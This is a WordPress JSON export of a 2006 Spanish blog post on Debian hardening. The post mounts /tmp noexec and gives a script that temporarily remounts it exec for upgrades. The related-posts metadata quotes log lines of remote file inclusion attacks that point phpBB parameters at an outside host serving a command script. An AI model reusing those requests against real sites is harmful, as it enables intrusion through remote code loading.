{"id":295,"date":"2006-06-06T23:39:13","date_gmt":"2006-06-06T23:39:13","guid":{"rendered":"http:\/\/blografia.net\/vicm3\/?p=295"},"modified":"2006-06-06T23:39:13","modified_gmt":"2006-06-06T23:39:13","slug":"seguridad_en_debian","status":"publish","type":"post","link":"https:\/\/blografia.net\/vicm3\/2006\/06\/seguridad_en_debian\/","title":{"rendered":"Seguridad en Debian"},"content":{"rendered":"<p>Si se que es lo primero que se deberia leer, hay un excelente documento en debian.org que habla de la seguridad, con cosas tan locas como compilar kernel sin soporte para modulos (para evitar rootkits), atributos de filesystems y cosas que jamas habia oido siquiera nombrar y otras que no tenia idea de como hacer&#8230; pero encontre algo que ya sabia.<\/p>\n<p>En cierta forma es conveniente que \/tmp y \/var\/tmp sean montadas como particiones a parte y que se les agregue la opcion noexec y nosuid, en especial noexec, esto evita un monton de ataques que se han popularizado via cgi (php principalmente, como nota he de decir que he visto algunos interesantes en perl que no tienen problema para ejecutarse aun con el noexec, pero esa es otra historia y vale la pena contarla en otro momento).<\/p>\n<p>En fin que en la documentaci\u00f3n justo mencionan un detalle que habia notado cuando se hace apt-get dist-upgrade y dpkg intenta hacer preconfigure requiere que \/tmp sea executable y permita la execusi\u00f3n de los scripts de preconfiguraci\u00f3n y postconfiguraci\u00f3n.<\/p>\n<p>Asi que pues, todo se soluciona montando a fuerzas \/tmp en otras palabras.<\/p>\n<blockquote><p>\nmount -o remount,exec  \/tmp<br \/>\napt-get update &#038;&#038; apt-get dist-upgrade<br \/>\nmount -o remount,noexec \/tmp\n<\/p><\/blockquote>\n<p>\u00bfY por que no hacerlo un script?<\/p>\n<p>Asi que update.sh<br \/>\n[code=&#8217;Bash&#8217;]<br \/>\n#!bin\/bash<br \/>\nmount -o remount,exec \/tmp<br \/>\napt-get update &#038;&#038; apt-get dist-upgrade<br \/>\nmount -o remount,noexec \/tmp<br \/>\n[\/code]<\/p>\n<p>Si realmente sencillo, pero realmente util, me evita problemas y andar haciendo dpkg-reconfigure y otros hacks a mano para mantener saludables nuestros sistemas.<\/p>\n<p>Pain is a thing of the mind.  The mind can be controlled.<br \/>\n&#8211; Spock, \u00abOperation &#8212; Annihilate!\u00bb stardate 3287.2<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Si se que es lo primero que se deberia leer, hay un excelente documento en debian.org que habla de la seguridad, con cosas tan locas como compilar kernel sin soporte para modulos (para evitar rootkits), atributos de filesystems y cosas &hellip; <a href=\"https:\/\/blografia.net\/vicm3\/2006\/06\/seguridad_en_debian\/\">Sigue leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"jetpack_post_was_ever_published":false},"categories":[1],"tags":[],"class_list":["post-295","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":611,"url":"https:\/\/blografia.net\/vicm3\/2008\/11\/extraos-errores-de-php\/","url_meta":{"origin":295,"position":0},"title":"Extra\u00f1os errores de php","author":"vicm3","date":"24 noviembre, 2008","format":false,"excerpt":"Ayer, mientras intentaba subir la imagen que utilice para mi post de awstats perdi cas\u00ed una hora por que el php se moria... literalmente (a parte de que teniamos un trafico tremendo y uno de nuestros usuarios habia desactivado el antispam y estaba recibiendo cari\u00f1o de los vendedores de pildoras\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":440,"url":"https:\/\/blografia.net\/vicm3\/2007\/07\/robots_defacers\/","url_meta":{"origin":295,"position":1},"title":"Robots defacers","author":"vicm3","date":"10 julio, 2007","format":false,"excerpt":"A ultimas fechas me he encontrado con que los defacers y\/o script kiddies ya tienen unos scripts (valga la rebusnancia), automatizados en perl [code='Bash'] dominioatacado.com:75.126.134.16 - - [10\/Jul\/2007:01:34:30 -0500] \"GET \/guruforo\/index.php\/modules\/Forums\/admin\/admin_styles.php?phpb b_root_path=http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\" 200 56485 \"-\" \"libwww-perl\/5.805\" dominioatacado.com:75.126.134.16 - - [10\/Jul\/2007:10:07:56 -0500] \"GET \/guruforo\/index.php\/MOD_forum_fields_parse.php?phpbb_root_path =http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\" 200 56480 \"-\" \"libwww-perl\/5.805\"\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1368,"url":"https:\/\/blografia.net\/vicm3\/2014\/09\/unattended-upgrades\/","url_meta":{"origin":295,"position":2},"title":"unattended-upgrades","author":"vicm3","date":"23 septiembre, 2014","format":false,"excerpt":"Dpkg::Pre-Invoke {\"mount -o remount,exec \/tmp\";}; DPkg::Post-Invoke {\"mount -o remount,noexec \/tmp\";}; Quick hack as I use a noexec (nosuid, or whichever) \/tmp on \/etc\/apt\/apt.conf.d\/50unattended-upgrades we need to tell to dpkg to change \/tmp or some packages that need pre configuring will fail.","rel":"","context":"En \u00abGeneral\u00bb","block_context":{"text":"General","link":"https:\/\/blografia.net\/vicm3\/category\/general\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":370,"url":"https:\/\/blografia.net\/vicm3\/2006\/12\/respaldando\/","url_meta":{"origin":295,"position":3},"title":"Respaldando&#8230;","author":"vicm3","date":"15 diciembre, 2006","format":false,"excerpt":"Pues bien, no hay fecha que no se cumpla hoy finalmente se dio de baja el BB. Pero primero era necesario respaldar... puesto que la cosa esta cuenta con un GUI de web... pues habria que respaldar 238 cursos a mano... bueno podriamos escribir un script como sugirio Yunuen. Pero\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":223,"url":"https:\/\/blografia.net\/vicm3\/2006\/01\/mis_5_extraos_habitos\/","url_meta":{"origin":295,"position":4},"title":"Mis 5 extra\u00f1os habitos","author":"vicm3","date":"26 enero, 2006","format":false,"excerpt":"(Aun cuando odio las cadenas esta es interesante) Las reglas son la siguientes: Cada jugador debe publicar un mensaje con el t\u00edtulo \"mis 5 extra\u00f1os h\u00e1bitos\". Todas las personas que sean invitadas a jugar tambi\u00e9n indicar\u00e1n claramente el reglamento. Finalmente, cada participante escoger\u00e1 a otras 5 personas (a\u00f1adiendo el link\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":2681,"url":"https:\/\/blografia.net\/vicm3\/2025\/08\/debian-13-trixie\/","url_meta":{"origin":295,"position":5},"title":"Debian 13 Trixie","author":"vicm3","date":"22 agosto, 2025","format":false,"excerpt":"Hemos actualizado casi todo a la versi\u00f3n estable de Debian, totalmente recomendable leer los release notes, como en todo cambio de este tipo ya que vienen varias advertencias de los cambios y modificaciones, por ahora solo una m\u00e1quina que realmente corre un php viejo voy a esperar a que termine\u2026","rel":"","context":"En \u00abDebian\u00bb","block_context":{"text":"Debian","link":"https:\/\/blografia.net\/vicm3\/category\/debian\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts\/295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/comments?post=295"}],"version-history":[{"count":0,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts\/295\/revisions"}],"wp:attachment":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/media?parent=295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/categories?post=295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/tags?post=295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}